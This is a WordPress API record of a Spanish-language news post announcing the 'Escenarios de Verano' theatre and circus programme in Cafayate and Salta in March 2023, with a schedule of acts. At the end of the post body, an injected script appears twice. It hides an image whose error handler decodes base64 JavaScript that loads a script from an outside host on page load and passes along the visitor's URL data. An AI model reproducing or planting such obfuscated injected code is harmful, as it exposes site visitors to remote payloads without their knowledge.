{"id":2265,"date":"2023-02-23T13:36:32","date_gmt":"2023-02-23T16:36:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2265"},"modified":"2025-08-14T00:22:41","modified_gmt":"2025-08-14T03:22:41","slug":"escenarios-de-verano-en-cafayate-y-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2265","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/escenarios-de-verano-en-cafayate-y-la-usina-cultural-88053\">Escenarios de Verano en Cafayate y la Usina Cultural<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#ec2456\"><em>El Instituto Nacional del Teatro, junto a la Municipalidad de Cafayate, la Secretar\u00eda de Cultura y el Ministerio de Cultura de la Naci\u00f3n organizan el ciclo de intervenciones teatrales para el primer fin de semana de marzo.<\/em><\/h4>\n\n\n\n<p><strong>Manuel Ag\u00fcero<\/strong>, representante en Salta del Instituto Nacional del Teatro (INT) manifest\u00f3 \u201cfundamentalmente, como INT apoyamos la actividad teatral independiente ya que es nuestra misi\u00f3n y funci\u00f3n a ra\u00edz de lo establecido por la Ley Nacional del Teatro. Es por eso que nos encontraremos realizando el cierre de Escenarios de Verano, el ciclo teatral que se realiza en todo el pa\u00eds\u201d<\/p>\n\n\n\n<p>Al respecto de las presentaciones, Manuel nos comenta que \u201cEl 4 y 5 de marzo se podr\u00e1 disfrutar del lenguaje esc\u00e9nico en la ciudad de Cafayate y la Usina Cultural. Nuestro objetivo es llegar a p\u00fablicos diversos y difundir el arte a trav\u00e9s de intervenciones a cielo abierto, con entrada libre y gratuita\u201d.<\/p>\n\n\n\n<p>Finalmente, el funcionario anticip\u00f3 que \u201cdurante este a\u00f1o, definimos nuestra agenda de trabajo destacando los 40 a\u00f1os de vida en democracia que cumplimos como pa\u00eds. Es por esto que parte de nuestras actividades van a estar encuadradas en este festejo y se ver\u00e1 reflejado en las distintas l\u00edneas de trabajo, fomento &nbsp;y subsidios que gestionamos en conjunto con la Secretar\u00eda de Cultura de la Provincia\u201d.<\/p>\n\n\n\n<p><strong>S\u00e1bado 4 de marzo de 2023 \u2013 Plaza Central de Cafayate<\/strong><\/p>\n\n\n\n<p>17 horas:&nbsp;&nbsp;Las Cholas Mostras Encuarentenadas<\/p>\n\n\n\n<p>En Escena: Mariela \u201cChavela\u201d Ch\u00e1vez y Pamela \u201cPantu\u201d Vera.<\/p>\n\n\n\n<p>T\u00e9cnica: Estefan\u00eda Canedi<\/p>\n\n\n\n<p>S\u00edntesis argumental: Dos amigas Cholas, se encuentran en la plaza y nos divierten con los relatos de las mil peripecias que tuvieron que pasar para sobrevivir a la cuarentena, en tono de humor ser\u00e1n nuestras presentadoras.<\/p>\n\n\n\n<p>G\u00e9nero: Comedia &#8211; Humor<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>17:15 horas:&nbsp;Pelotas al ataque de Fidel Rojas<\/p>\n\n\n\n<p>Grupo: Los Pelotas<\/p>\n\n\n\n<p>En escena: Fidel Rojas<\/p>\n\n\n\n<p>S\u00edntesis argumental: Casi un espect\u00e1culo de clown, con un toque de seriedad. Muchas preguntas y pocas respuestas reales.<\/p>\n\n\n\n<p>Por fortuna, los pelotas encontrar\u00e1n en su viaje el motivo que los llev\u00f3 a convertirse en artistas circenses&#8230; en \u00a1La sonrisa de los ni\u00f1os! encontrar\u00e1n todas las respuestas&#8230;<\/p>\n\n\n\n<p>Ingenuidad y picard\u00eda, ternura y alegr\u00eda, la vida de estos artistas toman sentido en la sonrisa de los ni\u00f1os&#8230;<\/p>\n\n\n\n<p>G\u00e9nero: Clown, Circo, Teatro Callejero<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 30 minutos<\/p>\n\n\n\n<p>17:45 horas: \u201cEl show del payaso peine\u201d de Nicol\u00e1s Obreg\u00f3n<\/p>\n\n\n\n<p>Grupo: Misi\u00f3n Mono<\/p>\n\n\n\n<p>Actor: Nicol\u00e1s Obreg\u00f3n<\/p>\n\n\n\n<p>S\u00edntesis argumental: Un payaso y su circo &nbsp;recorre el mundo contando cuentos c\u00f3mico-terror\u00edficos, canciones, malabares, acrobacia y el n\u00famero del incre\u00edble tigre invisible.<\/p>\n\n\n\n<p>Todo contado con las herramientas f\u00edsicas y vocales, utilizando el humor como eje fundamental para el show.<\/p>\n\n\n\n<p>G\u00e9nero: Comedia, Clown y Mimo<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 30 minutos<\/p>\n\n\n\n<p>18:30 horas: Obra: \u201cShow de la percha\u201d&nbsp;<\/p>\n\n\n\n<p>Grupo: Compa\u00f1\u00eda Circo do Asfalto (Brasil)<\/p>\n\n\n\n<p>En escena: Fran y Douglas Marino<\/p>\n\n\n\n<p>S\u00edntesis argumental: Con su n\u00famero principal la Percha, un m\u00e1stil sostenido y equilibrado por una persona mientras que una segunda sube a la parte superior del m\u00e1stil en cuanto se equilibra y realiza hermosas acrobacias a metros de altura. En un contexto l\u00fadico con sus dos protagonistas, Palha\u00e7a Francisquinha y Malabarista Diou, el espect\u00e1culo sigue de una manera muy divertida y c\u00f3mica y con cada tema siempre un final virtuoso inesperado.<\/p>\n\n\n\n<p>G\u00e9nero: Circo, Teatro Callejero<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 40 minutos<\/p>\n\n\n\n<p><strong>Domingo 5 de marzo&nbsp;\u2013 Usina Cultural Salta<\/strong><\/p>\n\n\n\n<p>17:30 horas: Las Cholas Mostras Encuarentenadas<\/p>\n\n\n\n<p>En Escena: Mariela \u201cChavela\u201d Ch\u00e1vez y Pamela \u201cPantu\u201d Vera.<\/p>\n\n\n\n<p>T\u00e9cnica: Estefan\u00eda Canedi<\/p>\n\n\n\n<p>S\u00edntesis argumental: Dos amigas Cholas, se encuentran en la plaza y nos divierten con los relatos de las mil peripecias que tuvieron que pasar para sobrevivir a la cuarentena, en tono de humor ser\u00e1n nuestras presentadoras.<\/p>\n\n\n\n<p>G\u00e9nero: Comedia &#8211; Humor<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>17:45 horas: Pelotas al ataque de Fidel Rojas<\/p>\n\n\n\n<p>Grupo: Los Pelotas<\/p>\n\n\n\n<p>En escena: Fidel Rojas<\/p>\n\n\n\n<p>S\u00edntesis argumental: Casi un espect\u00e1culo de clown, con un toque de seriedad. Muchas preguntas y pocas respuestas reales.<\/p>\n\n\n\n<p>Por fortuna, los pelotas encontrar\u00e1n en su viaje el motivo que los llev\u00f3 a convertirse en artistas circenses&#8230; en \u00a1La sonrisa de los ni\u00f1os! encontrar\u00e1n todas las respuestas&#8230;<\/p>\n\n\n\n<p>Ingenuidad y picard\u00eda, ternura y alegr\u00eda, la vida de estos artistas toman sentido en la sonrisa de los ni\u00f1os&#8230;<\/p>\n\n\n\n<p>G\u00e9nero: Clown, Circo, Teatro Callejero<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 30 minutos<\/p>\n\n\n\n<p>18:15 horas: Obra: \u201cEl show del payaso peine\u201d de Nicol\u00e1s Obreg\u00f3n<\/p>\n\n\n\n<p>Grupo: Misi\u00f3n Mono<\/p>\n\n\n\n<p>Actor: Nicol\u00e1s Obreg\u00f3n<\/p>\n\n\n\n<p>S\u00edntesis argumental: Un payaso y su circo &nbsp;recorre el mundo contando cuentos c\u00f3mico-terror\u00edficos, canciones, malabares, acrobacia y el n\u00famero del incre\u00edble tigre invisible.<\/p>\n\n\n\n<p>Todo contado con las herramientas f\u00edsicas y vocales, utilizando el humor como eje fundamental para el show.<\/p>\n\n\n\n<p>G\u00e9nero: Comedia, Clown y Mimo<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 30 minutos<\/p>\n\n\n\n<p>19 horas: Obra: \u201cShow de la percha\u201d&nbsp;<\/p>\n\n\n\n<p>Grupo: Compa\u00f1\u00eda Circo do Asfalto (Brasil)<\/p>\n\n\n\n<p>En escena: Fran y Douglas Marino<\/p>\n\n\n\n<p>S\u00edntesis argumental: Con su n\u00famero principal la Percha, un m\u00e1stil sostenido y equilibrado por una persona mientras que una segunda sube a la parte superior del m\u00e1stil en cuanto se equilibra y realiza hermosas acrobacias a metros de altura. En un contexto l\u00fadico con sus dos protagonistas, Palha\u00e7a Francisquinha y Malabarista Diou, el espect\u00e1culo sigue de una manera muy divertida y c\u00f3mica y con cada tema siempre un final virtuoso inesperado.<\/p>\n\n\n\n<p>G\u00e9nero: Circo, Teatro Callejero<\/p>\n\n\n\n<p>P\u00fablico: Todo P\u00fablico<\/p>\n\n\n\n<p>Duraci\u00f3n: 40 minutos<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/escenarios-de-verano-en-cafayate-y-la-usina-cultural-88053\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Instituto Nacional del Teatro, junto a la Municipalidad de Cafayate, la Secretar\u00eda de Cultura y el Ministerio de Cultura de la Naci\u00f3n organizan el ciclo de intervenciones teatrales para el primer fin de semana de marzo. Manuel Ag\u00fcero, representante en Salta del Instituto Nacional del Teatro (INT) manifest\u00f3 \u201cfundamentalmente, como INT apoyamos la actividad [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2265","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2265"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2265"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2265\/revisions"}],"predecessor-version":[{"id":7167,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2265\/revisions\/7167"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2266"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}